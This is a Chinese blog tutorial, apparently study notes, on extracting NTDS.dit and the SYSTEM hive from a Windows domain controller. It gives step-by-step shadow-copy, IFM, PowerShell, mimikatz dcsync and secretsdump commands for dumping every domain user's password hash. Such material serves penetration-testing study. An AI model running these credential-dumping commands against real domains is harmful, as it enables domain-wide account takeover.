内网渗透--提取域控NTDS

最新推荐文章于 2024-08-10 10:00:00 发布
最新推荐文章于 2024-08-10 10:00:00 发布
阅读量841 收藏 3
点赞数 2
分类专栏: 内网渗透 #学习笔记 文章标签: web安全 安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62169455/article/details/133251459
版权

NTDS基础

NTDS.DIT:为DC的数据库,内容有域用户、域组、用户hash等信息,域控上的ntds.dit只有可以登录到域控上的用户(如域管用户、DC本地管理员用户)可以访问,为了进一步保护密码哈希值,使用存储在SYSTEM注册表配置单元中的密钥对这些哈希值进行加密。

位置:C:\Windows\NTDS

该文件和SAM文件类似,是不能直接读取的,也不能复制

因此如果要读取该文件的内容有一下几种方式:

  1. 离线读取,将NTDS文件复制到攻击者的本地,然后使用工具读取
  2. 在线读取,通过给域控的电脑上传读取的工具,进行在线读取
  3. 远程读取,不需要上线域控,可以通过dcsync远程读取

卷影拷贝技术

方式一:通过ntdsutil工具进行拷贝

  • 本地测试

ntdsutil.exe是一个为活动目录提供管理机制的命令行公具,该工具默认安装在域控服务器上,可以在域控制器上直接操作

 1.创建一个NTDS快照

命令:ntdsutil.exe snapshot "activate instance ntds" create q q

2.加载快照到磁盘中(mount:挂载)

命令:ntdsutil.exe snapshot "mount {f1ed5cfd-c28c-4cf5-8fb8-a5d473b8e880}" q q

3.复制快照中的ntds.dit文件

命令:copy '快照地址\Windows\NTDS\ntds.dit' 目标地址

copy C:\$SNAP_202309231542_VOLUMEC$\Windows\NTDS\ntds.dit C:\Users\Administrator\Desktop\ntds.dit

4.删除快照

命令:ntdsutil.exe snapshot "umount {f1ed5cfd-c28c-4cf5-8fb8-a5d473b8e880}" "delete {f1ed5cfd-c28c-4cf5-8fb8-a5d473b8e880}" q q

  • cs测试

1.创建一个NTDS快照,我这里是Administrator权限,并没有报错(如果这里使用Administrator创建快照报错的话,可以使用令牌将权限切换到system)

命令:ntdsutil.exe snapshot "activate instance ntds" create q q

2.加载快照到磁盘中(mount:挂载)

命令:ntdsutil.exe snapshot "mount {01ff8c71-7f7f-4287-a760-9551b7db6690}" q q

3.复制快照中的ntds.dit文件

命令:copy C:\$SNAP_202309231619_VOLUMEC$\Windows\NTDS\ntds.dit C:\Users\Administrator\Desktop\ntds.dit

4.删除快照

命令:ntdsutil.exe snapshot "umount {01ff8c71-7f7f-4287-a760-9551b7db6690}" "delete {01ff8c71-7f7f-4287-a760-9551b7db6690}" q q

方式二:通过vssadmin工具进行拷贝

  • 本地测试

1.创建一个C盘快照

命令:vssadmin create shadow /for=c:

2.将快照中的NTDS文件复制出来

命令:copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3\Windows\NTDS\ntds.dit C:\Users\Administrator\Desktop\ntds.dit

3.删除快照

命令:vssadmin delete shadows /for=c: /quiet

  • cs测试

CS测试和上面步骤差不多

方式三:IFM方式进行拷贝

  • 本地测试

可以通过创建一个IFM的方式获取ntds.dit,在使用ntdsutil创建媒体安装集(IFM)时,需要进行生成快照、加载、将ntds.dit和计算机的SAM文件复制到目标文件夹中等操作

1.创建一个C盘下的快照,首先需要去C盘下创建一个test

命令:ntdsutil "ac i ntds" "ifm" "create full c:/test" q q

此时ntds.dit将被保存在C:\test\Active Directory下,SYSTEM和SECURITY两个文件将被保存在C:\test\registry文件夹下

2.将快照中的NTDS文件复制出来

命令:copy "C:\test\Active Directory\ntds.dit" C:\Users\Administrator\Desktop\ntds.dit

  • CS测试

CS测试与上述步骤差不多

方式四:vssown提取ntds.dit

  • 本地测试

vssown是一个vbs脚本,可以创建和删除卷影副本,使用方式如下:

1.启动卷影复制服务

命令:cscript vssown.vbs /start

2.创建一个C盘下的卷影副本

命令:cscript vssown.vbs /create c

3.列出当前卷影副本

命令:cscript vssown.vbs /list

4.复制文件到指定目录

命令:copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\Windows\NTDS\ntds.dit C:\Users\Administrator\Desktop\ntds.dit

  • CS测试

CS测试与上述步骤差不多

其他方式

除了使用卷影拷贝技术外,还有其他方式可以提取NTDS文件

方式一:PS脚本可以直接导出 Copy-VSS.ps1

命令:Import-Module .\Copy-VSS.ps1

Copy-VSS

方式二:Invoke-NinjaCopy

Invoke-NinjaCopy也是PS脚本可以直接导出NTDS和system文件

命令:Import-Module -name .\Invoke-NinjaCopy.ps1

Invoke-NinjaCopy -Path "C:\windows\ntds\ntds.dit" -LocalDestination "C:\Users\Administrator\Desktop\ntds.dit"

Invoke-NinjaCopy -Path "C:\Windows\System32\config\SYSTEM" -LocalDestination "C:system.hiv"

离线读取NTDS文件中的Hash值

一般步骤:

  1. 将远端域控的ntds.dit下载到本地
  2. 然后利用工具在本地进行

注意:因为system.hive里存放着ntds.dit的秘钥,所以需要转储system.hive,不然没办法查看ntds.dit里面的内容

命令:reg save hklm\system C:\Users\Administrator\Desktop\system.hive

方式一:secretsdump工具

secretsdump.exe -system system.hive -ntds ntds.dit LOCAL

方式二:NTDSDumpEx工具

命令:NTDSDumpEx.exe -d ntds.dit -s system.hive -o 1.txt

方式三:esedbexport工具

esedbexport是linux下的工具,先要在自己的linux机器上安装建议在python2环境下运行

下载工具包:

./configure

make

make install

ldconfig

提取ntds文件内容

esedbexport -m tables ntds.dit

安装ntdsxtract工具

python setup.py build

python setup.py install

如果提示Import Error:NO module named Crypto.Hash,则需要先执行pip install pycryptodome

将ntds.dit. Export和SYSTEM文件放入到esedbexport工具的文件夹中,然后导出哈希值,最后的结果将保存在txt里

python dsusers.py datatable.4 link_table.7 output --syshive system.hive --passwordhashes --pwdformat ocl--ntoutfile ntout --lmoutfile Imout|tee 1.txt读取用户信息

python dscomputers.py datatable.4 computer_output --csvoutfile 2.csv读取机器信息

方式四:DS Internals工具

DS Internals工具是PS脚本,使用命令如下:

Install-Module DSInternals -Force

Import-Module .\DSInternals

导出hash,并保存在txt文件里

$key=Get-Bootkey -SystemHivePath 'system.hiv'

Get-ADDBAccount -All -DBPath 'ntds.dit' -Bootkey $key | Out-File 1.txt

在线读取NTDS文件Hash值

但是需要考虑:杀软工具、如果域太大读取时间太久容易死机

方式一:MImikatz工具

命令:lsadump::dcsync /domain:abc.com /all /cvs(读取所有)

lsadump::dcsync /domain:abc.com /user:administrator(读取单个用户)

方式二:QuarksPWDump工具

命令:QuarksPWDump.exe --dump-hash-domain --ntds-file ntds.dit

Ntds这个文件需要先导出来

方式三:secretsdump工具

命令:secretsdump.exe 域名/administrator:密码@IP

方式四:Invoke-DCSync.ps1工具

命令:Import-Module .\Invoke-DCSync.ps1

Invoke-DCSync

香芋味儿的霜
关注
专栏目录
导出NTDS.dit中的散列值
谢公子的博客
02-08 1703
目录 使用esedbexport导出散列值 使用impacket工具包导出散列值 当我们获得了域控上的NTDS.dit文件后,我们肯定需要想办法从中导出其中的散列值。 使用esedbexport导出散列值 导出ntds.dit表信息 先安装esedbexport apt-get install autoconf automake autopoint libtool pkg-conf...
内网渗透-内网环境下的横向移动总结
lza20001103的博客
08-19 1448
内网环境下的横向移动总结
ntds.dit文件的获取与解密
热门推荐
Shanfenglan's blog
08-21 28万+
它们在哪儿? ntds.dit文件是域环境中域控上会有的一个文件,这个文件存储着域内所有用户的凭据信息(hash)。非域环境也就是在工作组环境中,有一个sam文件存储着当前主机用户的密码信息,想要破解sam文件与ntds.dit文件都需要拥有一个system文件。 ntds.dit文件位置: C:\Windows\NTDS\NTDS.dit system文件位置:C:\Windows\System32\config\SYSTEM sam文件位置:C:\Windows\System32\config\SAM
域控安全 ----> Ntds.dit文件抓取
最新发布
A_991128a的博客
08-10 728
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。干货主要有:①1000+CTF历届题库(主流和经典的应该都有了)②CTF技术文档(最全中文版)③项目源码(四五十个有趣且经典的练手项目及源码)
内网渗透-windows获取(本地、域、Ntds.dit)登录凭证实战手法总结(超详细)
分享IT行业各种技术经验,从入门到入行,关注我学习更多知识。
02-03 1937
当获取一台域内主机权限时,接下来的渗透思路就是要获取更高权限的账号,用来访问域控或横向拓展,那么在获取本地用户、域用户凭证和获取域控Ntds.dit这一块就极其重要,将详细介绍红队渗透中使用获取登录凭证的手法。
内网安全:05.dump内网DC的ntds.dit,获取hash
qq_38461377的博客
07-08 282
叙述:有时候我们碰到一个内网环境,有DC的密码,于是使用这个方法,导出DC中所有内网主机的密码并破解 0x0 环境 DC:172.31.20.30  domain用户:pentest\administrator 密码:UFhae&pwL%F 内网主机A(win 2012):172.31.21.166 psexec:https://docs.microsoft.com/en-us/sysinternals/downloads/psexec secretsdump:https://github.co.
创建BDC域控制器时,提示“出站复制验证失败。在复制源域控制器上未启用出站复制”的解决办法...
weixin_34040079的博客
06-21 990
创建BDC域控制器时,在完成角色添加后的部署界面,进行配置后的先决条件检查,提示失败如下: 后在现有DC上通过windows powershell(CMD管理员模式)运行repadmin /showrepl,得到 运行repadmin /options [YourServerName] -disable_inbound_replrepadmin /options [YourServerName] ...
内网渗透(四十八)之域控安全和跨域攻击-多种方式在线读取ntds.dit文件中的hash值
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-22 232
在线的方式就是直接读取不需要在导出ntds文件,在域环境中,不要直接在线获取hash,特别是域环境比较大的时候,在线获取hash等待时时间较长,工具占用资源太多,容易造成域控服务器崩溃。Invoke-DCSyncs是powershell脚本可以在线读取内存中的用户hash。使用impacket包中的secretsdump.exe程序直接读取。1、上传工具到目标机器,使用命令先导出ntds文件,然后直接读取。2、也可以读取单个用户的hash。1、可以读取所有用户的hash。
内网渗透(四十九)之域控安全和跨域攻击-多种方式离线读取ntds.dit文件中的hash值
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-22 438
2、将ntds.dit文件放入libesedb-20210424文件夹内,导出 ntds.dit,两个重要的表为:datatable以及link_table,他们都会被存放在./ntds.dit.export/文件夹中。注意:因为 system.hive 里存放着 ntds.dit 的秘钥,所以需要转储 system.hive ,不然没法查看ntds.dit 里内容。将 ntds.dit.export 和 SYSTEM 文件还有ntds.dit放入到 和secretsdump.exe 同级目录下。
红队专题-内网横向-工作组Workgroup与 Domain Active Directory域渗透
aming小老弟
12-21 1288
通过使用活动目录,管理员能够中心化、批量地更新和管理操作系统、应用、用户以及对数据的访问,而用户和管理员也能很容易地获取这些信息。而且因为活动目录具备中心化的管理能力,攻击者一旦获得域管理员权限,即可控制域内所有用户和主机,因此活动目录域环境也备受攻击者青睐。实际上LSA保护不能抵御这些攻击,它只会让你在执行这些攻击前,需要做一些额外的操作,让攻击变得更加困难一些。此功能基于PPL技术,它是一种纵深防御的安全功能,旨在“防止非管理员非PPL进程通过打开进程之类的函数串改PPL进程的代码和数据”。
内网渗透(四十七)之域控安全和跨域攻击-多种方式提取和移动ntds.dit文件
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-21 295
通过前面系列文章的学习,我们已经学会了通过横向移动的方法拿下域控,在我们控制域控后,我们应该读取域控上的ntds.dit文件,获取域内所有用户的密码和hash,以此来控制所有的域内机器ntds.dit为ad的数据库,内容有域用户、域组、用户hash等信息,域控上的ntds.dit只有可以登录到域控的用户(如域管用户、DC本地管理员用户)可以访问。ntds.dit包括三个主要表:数据表、链接表、sd表。
使用卷影拷贝提取ntds.dit
weixin_41082546的博客
02-15 851
一、简介   通常情况下,即使拥有管理员权限,也无法读取域控制器中的C:\Windows\NTDS\ntds.dit文件。使用windows本地卷影拷贝服务,就可以获得该文件的副本。   在活动目录中,所有的数据都保存在ntds.dit中。ntds.dit是一个二进制文件,存储位置为域控制器的%SystemRoot%\ntds\ntds.dit。ntds.dit中包含用户名、散列值、组、GPP...
域控安全 ----> Ntds
2401_84969291的博客
05-14 345
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
导出域控ntds.dit文件
谢公子的博客
02-08 2910
目录 NTDS.dit 通过ntdsutil.exe提取NTDS.dit 通过vssadmin提取ntds.dit 通过vssown.vbs脚本提取ntds.dit 使用ntdsutil的IFM创建卷影拷贝 使用diskshadow导出ntds.dit 导出SYSTEM文件 主机运维人员监控卷影拷贝服务的使用情况 NTDS.dit 在活动目录中,所有的数据都保存在域控的 ntd...
[内网渗透]—卷影拷贝提取ntds.dit
Sentiment的博客
12-08 968
ntds.dit文件是一个数据库,用于存储Active Directory数据,包括有关用户对象,组和组成员身份的信息。它包括域中所有用户的密码哈希。通过提取这些哈希值,可以使用诸如Mimikatz之类的工具执行哈希传递攻击,或使用诸如Hashcat之类的工具来破解这些密码。这些密码的提取和破解可以脱机执行,因此将无法检测到。一旦攻击者提取了这些散列,它们便可以充当域上的任何用户,包括域管理员。在活动目录中,所有的数据都保存在ntds.dit中。
域之ntds.dit
SecINAdmin的博客
11-26 1394
ntds.dit ​ ntds.dit为ad的数据库(C:\Windows\NTDS),内容有域用户、域组、用户hash等信息,域控上的ntds.dit只有可以登录到域控的用户(如域管用户、DC本地管理员用户)可以访问。ntds.dit包括三个主要表:数据表、链接表、sd表。所以只要在域渗透中能够获取到ntds.dit就可以获取到所有域用户的用户名和对应的hash,ntds.dit是加密的,需要获取system来解密。查看dit数据库可使用https://github.com/yosqueoy/ditsna
渗透测试——域内信息收集(2)
weixin_74171325的博客
06-04 519
参考蚁景教学实验笔记
保障企业网络稳定:域控服务器备份与恢复策略详解
AD服务备份则针对Ntds.dit(数据库)、事务日志、检查点文件和预留日志文件,以及SYSVOL(系统卷)中的登录脚本、策略对象、用户登录脚本、组策略和FRS(文件复制服务)等重要组件。同时,考虑到密码的生命周期,AD...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值